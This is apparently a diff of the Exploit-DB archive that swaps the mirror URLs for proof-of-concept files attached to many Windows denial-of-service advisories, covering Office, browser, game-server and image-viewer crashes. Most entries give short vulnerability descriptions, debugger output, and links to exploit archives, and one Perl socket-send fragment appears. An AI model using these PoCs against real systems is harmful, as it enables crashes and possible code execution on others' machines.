b/exploits/windows/dos/22132.txt @@ -4,4 +4,4 @@ Microsoft Windows is vulnerable to a denial of service condition when attempting The exact cause of this issue is not currently known, however, this record will be updated if and when more details become available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22132.otf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22132.otf \ No newline at end of file diff --git a/exploits/windows/dos/22215.txt b/exploits/windows/dos/22215.txt index 3430a3e1e..9fd6a7e7a 100644 --- a/exploits/windows/dos/22215.txt +++ b/exploits/windows/dos/22215.txt @@ -127,4 +127,4 @@ Recommended Bug Title: Stack Overflow starting at wwlib+0x000000000000458e (Hash Proof of concept poc.doc included. Exploit-DB Note: This also works on Word 2007 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22215.tar.gz \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22215.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/22239.txt b/exploits/windows/dos/22239.txt index 8e18d8e63..3d7d37ca1 100644 --- a/exploits/windows/dos/22239.txt +++ b/exploits/windows/dos/22239.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/6811/info The Opera browser for Win32 (and possibly other) systems is prone to a remotely exploitable buffer overflow condition. For security purposes, Opera will display a warning any time a user of the client visits a link containing a username as part of the URI. An excessively long username will trigger a buffer overflow condition related to this security feature that may overwrite the stack frame of the affected function. Attackers may exploit this vulnerability to execute instructions on client systems. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22239.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22239.tgz \ No newline at end of file diff --git a/exploits/windows/dos/22310.txt b/exploits/windows/dos/22310.txt index 66668ed7f..b590bf9da 100644 --- a/exploits/windows/dos/22310.txt +++ b/exploits/windows/dos/22310.txt @@ -115,4 +115,4 @@ later write. ################################################################################ Proof of concept included. http://www31.zippyshare.com/v/29089672/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22310.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22310.rar \ No newline at end of file diff --git a/exploits/windows/dos/22330.txt b/exploits/windows/dos/22330.txt index 9c477f44e..1aa2f6939 100644 --- a/exploits/windows/dos/22330.txt +++ b/exploits/windows/dos/22330.txt @@ -33,4 +33,4 @@ Excel!Ordinal40+0x1ce0d0: Proof of concept included. http://www36.zippyshare.com/v/48422905/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22330.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22330.rar \ No newline at end of file diff --git a/exploits/windows/dos/22395.txt b/exploits/windows/dos/22395.txt index e9ab65a81..01c0fe9fe 100644 --- a/exploits/windows/dos/22395.txt +++ b/exploits/windows/dos/22395.txt @@ -6,4 +6,4 @@ The vulnerability occurs when numerous chat dialog boxes are opened by the eDonk An attacker can exploit this vulnerability by connecting to a vulnerable eDonkey user and issuing numerous chat requests. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22395.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22395.zip \ No newline at end of file diff --git a/exploits/windows/dos/22402.txt b/exploits/windows/dos/22402.txt index 882bb171f..9e471cf0d 100644 --- a/exploits/windows/dos/22402.txt +++ b/exploits/windows/dos/22402.txt @@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable. Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22402.rar \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22402.rar \ No newline at end of file diff --git a/exploits/windows/dos/22420.txt b/exploits/windows/dos/22420.txt index 5952330c6..dafd3a8ef 100644 --- a/exploits/windows/dos/22420.txt +++ b/exploits/windows/dos/22420.txt @@ -4,4 +4,4 @@ A denial of service vulnerability has been reported for Emule. The vulnerability This vulnerability was reported for Emule clients prior to 0.27c. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22420.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22420.zip \ No newline at end of file diff --git a/exploits/windows/dos/22464.txt b/exploits/windows/dos/22464.txt index 2dcdaf063..c606c0b24 100644 --- a/exploits/windows/dos/22464.txt +++ b/exploits/windows/dos/22464.txt @@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8: Proof of concept included. http://www42.zippyshare.com/v/23669551/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22464.pdf \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22464.pdf \ No newline at end of file diff --git a/exploits/windows/dos/22591.txt b/exploits/windows/dos/22591.txt index c5312e9c3..2a52d1a69 100644 --- a/exploits/windows/dos/22591.txt +++ b/exploits/windows/dos/22591.txt @@ -122,4 +122,4 @@ Instruction Address: 0x00000000302d68ca Proof of concept included. http://www19.zippyshare.com/v/5620945/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22591.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22591.rar \ No newline at end of file diff --git a/exploits/windows/dos/22655.txt b/exploits/windows/dos/22655.txt index 87962acd9..f847c43bc 100644 --- a/exploits/windows/dos/22655.txt +++ b/exploits/windows/dos/22655.txt @@ -32,4 +32,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 Proof of concept included. http://www37.zippyshare.com/v/79789962/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22655.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22655.rar \ No newline at end of file diff --git a/exploits/windows/dos/22679.txt b/exploits/windows/dos/22679.txt index ea1dc8526..92ad0c0a2 100644 --- a/exploits/windows/dos/22679.txt +++ b/exploits/windows/dos/22679.txt @@ -70,4 +70,4 @@ VISLIB!Ordinal1+0x28f325 Proof of concept included. http://www24.zippyshare.com/v/85134950/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22679.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22679.rar \ No newline at end of file diff --git a/exploits/windows/dos/22680.txt b/exploits/windows/dos/22680.txt index 8ebcf8bb4..96b41b699 100644 --- a/exploits/windows/dos/22680.txt +++ b/exploits/windows/dos/22680.txt @@ -56,4 +56,4 @@ a heap-based buffer overflow via a specially crafted BMP image containing many ============= http://protekresearchlab.com/exploits/PRL-2012-32.rle -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz) \ No newline at end of file diff --git a/exploits/windows/dos/22681.txt b/exploits/windows/dos/22681.txt index 1e6d184d2..187765de4 100644 --- a/exploits/windows/dos/22681.txt +++ b/exploits/windows/dos/22681.txt @@ -55,4 +55,4 @@ heap-based buffer overflow via a specially crafted "ImageWidth" value. ============= http://protekresearchlab.com/exploits/PRL-2012-31.tif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz) \ No newline at end of file diff --git a/exploits/windows/dos/22850.txt b/exploits/windows/dos/22850.txt index 1afc27a2f..6245c3632 100644 --- a/exploits/windows/dos/22850.txt +++ b/exploits/windows/dos/22850.txt @@ -79,4 +79,4 @@ Short Description: WriteAV ############################################################################### Proof of concept included. http://www43.zippyshare.com/v/27372192/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22850.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22850.rar \ No newline at end of file diff --git a/exploits/windows/dos/22855.txt b/exploits/windows/dos/22855.txt index 6a16b2c04..98554778e 100644 --- a/exploits/windows/dos/22855.txt +++ b/exploits/windows/dos/22855.txt @@ -25,6 +25,6 @@ cause a denial of service (application crash) via a crafted Targa image. * PoC : http://www18.zippyshare.com/v/40547915/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22855.tga +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22855.tga * \ No newline at end of file diff --git a/exploits/windows/dos/22878.txt b/exploits/windows/dos/22878.txt index d775b8ea6..c490e2b75 100644 --- a/exploits/windows/dos/22878.txt +++ b/exploits/windows/dos/22878.txt @@ -164,8 +164,8 @@ Short Description: WriteAV Proof of concept : CoolType http://www36.zippyshare.com/v/25032778/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22878-1.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22878-1.rar JP2KLib http://www7.zippyshare.com/v/22655486/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22878-2.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22878-2.rar \ No newline at end of file diff --git a/exploits/windows/dos/22899.txt b/exploits/windows/dos/22899.txt index d4f01998f..c73c271f0 100644 --- a/exploits/windows/dos/22899.txt +++ b/exploits/windows/dos/22899.txt @@ -4,4 +4,4 @@ StarSiege Tribes Game Server has been reported prone to a remotely triggered den The issue presents itself when the affected server receives and processes a malformed UDP datagram. Reportedly when the server handles a UDP datagram containing malformed data, an exception will be thrown and the StarSiege Tribes Game Server will crash. Service will be denied, to current connected users of the system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22899.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22899.zip \ No newline at end of file diff --git a/exploits/windows/dos/23107.txt b/exploits/windows/dos/23107.txt index dd5ddf041..02e4ba953 100644 --- a/exploits/windows/dos/23107.txt +++ b/exploits/windows/dos/23107.txt @@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable. ################################################################################ Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23107.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23107.zip \ No newline at end of file diff --git a/exploits/windows/dos/23201.txt b/exploits/windows/dos/23201.txt index 6744fd8ef..1fcf3912f 100644 --- a/exploits/windows/dos/23201.txt +++ b/exploits/windows/dos/23201.txt @@ -66,4 +66,4 @@ User mode DEP access violations are exploitable. Proof of concept included. http://www39.zippyshare.com/v/91522221/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23201.rar \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23201.rar \ No newline at end of file diff --git a/exploits/windows/dos/23246.txt b/exploits/windows/dos/23246.txt index 515b3f5ad..f325e37dd 100644 --- a/exploits/windows/dos/23246.txt +++ b/exploits/windows/dos/23246.txt @@ -87,7 +87,7 @@ overflow occurs POC ==== Attached proof of concept. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23246.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23246.tar.gz !Exploitable output =================== diff --git a/exploits/windows/dos/23288.txt b/exploits/windows/dos/23288.txt index 42e733b88..acc7d664f 100644 --- a/exploits/windows/dos/23288.txt +++ b/exploits/windows/dos/23288.txt @@ -13,4 +13,4 @@ Old version installer at [3] [4]. [3] http://gd.tuwien.ac.at/graphics/irfanview/plugins/irfanview_plugins_433_setup.exe [4] http://gd.tuwien.ac.at/graphics/irfanview/iview433_setup.exe -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23288.tar.gz \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23288.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/23469.txt b/exploits/windows/dos/23469.txt index 39cb9beff..2da5cf688 100644 --- a/exploits/windows/dos/23469.txt +++ b/exploits/windows/dos/23469.txt @@ -54,4 +54,4 @@ Instruction Address: 0x0000000001953095 Proof of concept included. http://www48.zippyshare.com/v/64875465/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23469.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23469.rar \ No newline at end of file diff --git a/exploits/windows/dos/23496.txt b/exploits/windows/dos/23496.txt index f04c359e9..2d2f517ec 100644 --- a/exploits/windows/dos/23496.txt +++ b/exploits/windows/dos/23496.txt @@ -1,4 +1,4 @@ -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23496.tar.gz +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23496.tar.gz CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" Symbol search path is: *** Invalid *** diff --git a/exploits/windows/dos/23686.txt b/exploits/windows/dos/23686.txt index 9fe87faa8..b34f758eb 100644 --- a/exploits/windows/dos/23686.txt +++ b/exploits/windows/dos/23686.txt @@ -4,4 +4,4 @@ Monkey HTTP Daemon is prone to a denial of service attacks. HTTP GET requests, w The server will need to be restarted to regain normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23686.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23686.rar \ No newline at end of file diff --git a/exploits/windows/dos/23846.txt b/exploits/windows/dos/23846.txt index 8063bfe30..9beb35e6f 100644 --- a/exploits/windows/dos/23846.txt +++ b/exploits/windows/dos/23846.txt @@ -4,4 +4,4 @@ Symantec Client Firewall has been reported to be prone to a remote denial of ser It is reported that this vulnerability will have a system wide impact, causing Windows GUI and peripherals that are attached to the host to become unresponsive. A hard reset is reported to be required to restore normal functionality to the system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23846.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23846.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/24135.html b/exploits/windows/dos/24135.html index b0a3fc26b..46210f1bf 100644 --- a/exploits/windows/dos/24135.html +++ b/exploits/windows/dos/24135.html @@ -10,7 +10,4 @@ This issue could be exploited by a remote attacker to cause a denial of service - - - - + \ No newline at end of file diff --git a/exploits/windows/dos/24178.txt b/exploits/windows/dos/24178.txt index 22b78170d..b2ac50a17 100644 --- a/exploits/windows/dos/24178.txt +++ b/exploits/windows/dos/24178.txt @@ -4,4 +4,4 @@ ToCA Race Driver is reportedly affected by multiple remote denial of service vul These issues may allow an attacker to cause the affected application to crash or hang, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24178.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24178.zip \ No newline at end of file diff --git a/exploits/windows/dos/24463.txt b/exploits/windows/dos/24463.txt index 332358e88..b3204745b 100644 --- a/exploits/windows/dos/24463.txt +++ b/exploits/windows/dos/24463.txt @@ -12,4 +12,4 @@ # Reference: http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70 # Reference: http://secunia.com/advisories/51602 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24463.py \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24463.py \ No newline at end of file diff --git a/exploits/windows/dos/24586.txt b/exploits/windows/dos/24586.txt index d4d752a1f..5f8467a66 100644 --- a/exploits/windows/dos/24586.txt +++ b/exploits/windows/dos/24586.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability to deny service for legitimate Patches are available to address the issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24586.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24586.zip \ No newline at end of file diff --git a/exploits/windows/dos/24708.txt b/exploits/windows/dos/24708.txt index c623f4b65..e15cf1240 100644 --- a/exploits/windows/dos/24708.txt +++ b/exploits/windows/dos/24708.txt @@ -4,4 +4,4 @@ Master of Orion III is reported prone to multiple remote denial of service vulne Master of Orion III 1.2.5 and prior versions are reportedly affected by these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24708.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24708.tar \ No newline at end of file diff --git a/exploits/windows/dos/24726.txt b/exploits/windows/dos/24726.txt index e9155106e..959212815 100644 --- a/exploits/windows/dos/24726.txt +++ b/exploits/windows/dos/24726.txt @@ -10,4 +10,4 @@ A second vulnerability is reported in the manner in which 602 LAN SUITE handles A remote attacker may exploit this condition to exhaust all available sockets on a target computer that is running 602 LAN SUITE telnet proxy. This will effectively deny service to legitimate requests. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24726.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24726.zip \ No newline at end of file diff --git a/exploits/windows/dos/24743.txt b/exploits/windows/dos/24743.txt index 3c0071b4d..b8a5144c9 100644 --- a/exploits/windows/dos/24743.txt +++ b/exploits/windows/dos/24743.txt @@ -69,6 +69,6 @@ requires tricking a user into opening a malicious file. 4) POC =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24743.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24743.rar Password for attached rar file is 123 \ No newline at end of file diff --git a/exploits/windows/dos/24962.txt b/exploits/windows/dos/24962.txt index 395594213..1e6dc0cc2 100644 --- a/exploits/windows/dos/24962.txt +++ b/exploits/windows/dos/24962.txt @@ -26,4 +26,4 @@ Disasm:0055EB70 |> \33C0 |XOR EAX,EAX Advisory: http://www.fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042-EN.xml Exploit PoC: http://fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042.pdf - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24962.pdf \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24962.pdf \ No newline at end of file diff --git a/exploits/windows/dos/25007.txt b/exploits/windows/dos/25007.txt index dcd7b743f..d41ef4a6a 100644 --- a/exploits/windows/dos/25007.txt +++ b/exploits/windows/dos/25007.txt @@ -4,4 +4,4 @@ It is reported that Convex 3D is susceptible to a stack-based buffer overflow vu This vulnerability allows remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read a malicious file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25007.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25007.zip \ No newline at end of file diff --git a/exploits/windows/dos/25140.txt b/exploits/windows/dos/25140.txt index 2fc2b3c76..e71232e37 100644 --- a/exploits/windows/dos/25140.txt +++ b/exploits/windows/dos/25140.txt @@ -1,6 +1,6 @@ WPS Office Wpsio.dll Stack Buffer Overflow Vulnerability -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25140.tgz +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25140.tgz 1 Summary CVE number: CVE-2012-4886 diff --git a/exploits/windows/dos/25255.txt b/exploits/windows/dos/25255.txt index e523ecafd..8a50cdb4a 100644 --- a/exploits/windows/dos/25255.txt +++ b/exploits/windows/dos/25255.txt @@ -8,4 +8,4 @@ Another vulnerability can allow a remote attacker to send a malformed join packe These issues can be exploited to cause a denial of service condition in the server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25255.zip \ No newline at end of file diff --git a/exploits/windows/dos/25680.txt b/exploits/windows/dos/25680.txt index db2843f0c..0b6128ef6 100644 --- a/exploits/windows/dos/25680.txt +++ b/exploits/windows/dos/25680.txt @@ -6,4 +6,4 @@ This vulnerability allows remote attackers to crash the game server, denying ser Version 1.03, and prior are affected by this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25680.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25680.zip \ No newline at end of file diff --git a/exploits/windows/dos/25699.txt b/exploits/windows/dos/25699.txt index 49ca6a9df..e91596758 100644 --- a/exploits/windows/dos/25699.txt +++ b/exploits/windows/dos/25699.txt @@ -7,4 +7,4 @@ This issue was reported to affect Halo Game Server 1.06; earlier versions are li UPDATE: The vulnerability also affects Halo Game Server 1.07. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25699-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25699-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/25712.txt b/exploits/windows/dos/25712.txt index 8e884bce6..0022678d8 100644 --- a/exploits/windows/dos/25712.txt +++ b/exploits/windows/dos/25712.txt @@ -131,4 +131,4 @@ As attachment, code to reproduce the crash. + \ No newline at end of file diff --git a/exploits/windows/dos/25737.txt b/exploits/windows/dos/25737.txt index 2c8a79f1e..5a49371e1 100644 --- a/exploits/windows/dos/25737.txt +++ b/exploits/windows/dos/25737.txt @@ -4,4 +4,4 @@ The Microsoft 'user32.dll' library is prone to a denial of service vulnerability Reports indicate that this issue exists for user32.dll versions that reside on Microsoft Windows 98SE platforms. Other versions might also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25737.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25737.zip \ No newline at end of file diff --git a/exploits/windows/dos/25991.txt b/exploits/windows/dos/25991.txt index a3f63452d..9e0d33aa6 100644 --- a/exploits/windows/dos/25991.txt +++ b/exploits/windows/dos/25991.txt @@ -6,4 +6,4 @@ This issue was identified by creating random input for the browser, and has not Successful exploitation may result in execution of arbitrary code in the context of the user executing the affected browser. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25991.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25991.jpg \ No newline at end of file diff --git a/exploits/windows/dos/25992.txt b/exploits/windows/dos/25992.txt index 568ebb441..857a2bee8 100644 --- a/exploits/windows/dos/25992.txt +++ b/exploits/windows/dos/25992.txt @@ -6,6 +6,6 @@ This issue was identified by creating random input for the browser, and has not Successful exploitation results in crashing the affected Web browser. It may be possible that execution of arbitrary code may also be achieved, but this has not been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25992-1.jpg +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25992-1.jpg -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25992-2.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25992-2.jpg \ No newline at end of file diff --git a/exploits/windows/dos/26450.pl b/exploits/windows/dos/26450.pl index 7a04494e9..0bea359e6 100755 --- a/exploits/windows/dos/26450.pl +++ b/exploits/windows/dos/26450.pl @@ -33,4 +33,4 @@ $SOCKET = IO::Socket::INET->new(Proto=>'TCP', $SOCKET->send($PAYLOAD); -close($SOCKET); +close($SOCKET); \ No newline at end of file diff --git a/exploits/windows/dos/26457.txt b/exploits/windows/dos/26457.txt index 8382dd337..077fe4bc4 100644 --- a/exploits/windows/dos/26457.txt +++ b/exploits/windows/dos/26457.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue by enticing a user to visit a malicious site Few details are available at this time; this BID will be updated as further information is disclosed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26457.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26457.zip \ No newline at end of file diff --git a/exploits/windows/dos/26869.txt b/exploits/windows/dos/26869.txt index c9707ab08..580554b16 100644 --- a/exploits/windows/dos/26869.txt +++ b/exploits/windows/dos/26869.txt @@ -8,6 +8,6 @@ This BID will be updated and potentially split into separate records as further UPDATE (Mar 14, 2006): Microsoft has released security advisory MS06-012 addressing this and other issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26869-1.xls +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26869-1.xls -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26869-2.xls \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26869-2.xls \ No newline at end of file diff --git a/exploits/windows/dos/27047.txt b/exploits/windows/dos/27047.txt index 0b4922db9..a1c4535a3 100644 --- a/exploits/windows/dos/27047.txt +++ b/exploits/windows/dos/27047.txt @@ -148,7 +148,7 @@ Advisory CORE-2013-0701 released. [2] http://www.b-e-soft.com/products#artweaver. [3] http://www.coresecurity.com/system/files/attachments/2013/07/CORE-2013-0701-artweaver-poc-28ab190b137f3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27047.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27047.zip 11. *About CoreLabs* diff --git a/exploits/windows/dos/27049.txt b/exploits/windows/dos/27049.txt index 35f461557..4c7d409c9 100644 --- a/exploits/windows/dos/27049.txt +++ b/exploits/windows/dos/27049.txt @@ -141,7 +141,7 @@ Advisory CORE-2013-0705 released. [2] http://www.xnview.com/en/xnview/. [3] http://www.coresecurity.com/system/files/attachments/2013/07/CORE-2013-0705-xnview-poc-4895a357a242d3c78.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27049.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27049.zip 10. *About CoreLabs* diff --git a/exploits/windows/dos/27050.txt b/exploits/windows/dos/27050.txt index a0ea35909..77e9e7fa6 100644 --- a/exploits/windows/dos/27050.txt +++ b/exploits/windows/dos/27050.txt @@ -51,4 +51,4 @@ http://technet.microsoft.com/en-us/security/bulletin/ms13-056 PoC: https://docs.google.com/file/d/0B48gNjWDSsFwSDQ1ZGZEb3ItSEU -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27050.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27050.zip \ No newline at end of file diff --git a/exploits/windows/dos/27051.txt b/exploits/windows/dos/27051.txt index c1a31a20a..914b5789c 100644 --- a/exploits/windows/dos/27051.txt +++ b/exploits/windows/dos/27051.txt @@ -6,4 +6,4 @@ These problems present themselves when a user views a malicious WMF-formatted fi Reports indicate that these issues lead to a denial-of-service condition. Earlier conjectures that the issues may result in the execution of arbitrary code appear at this point to be incorrect. Attackers could force a crash or restart of the viewing application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27051.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27051.rar \ No newline at end of file diff --git a/exploits/windows/dos/27055.txt b/exploits/windows/dos/27055.txt index fba7a9774..61b61b2fc 100644 --- a/exploits/windows/dos/27055.txt +++ b/exploits/windows/dos/27055.txt @@ -4,6 +4,6 @@ Microsoft Excel is susceptible to a code-execution vulnerability. The issue pres Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27055-1.xls +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-1.xls -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27055-2.xls \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-2.xls \ No newline at end of file diff --git a/exploits/windows/dos/27069.txt b/exploits/windows/dos/27069.txt index af06c4b60..6030d43ed 100644 --- a/exploits/windows/dos/27069.txt +++ b/exploits/windows/dos/27069.txt @@ -8,4 +8,4 @@ This issue affects QuickTime 6.5.2 and 7.0.3; other versions may also be vulnera This issue may have previously been discussed in BID 16202 (Apple QuickTime Multiple Code Execution Vulnerabilities). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27069.jpg \ No newline at end of file 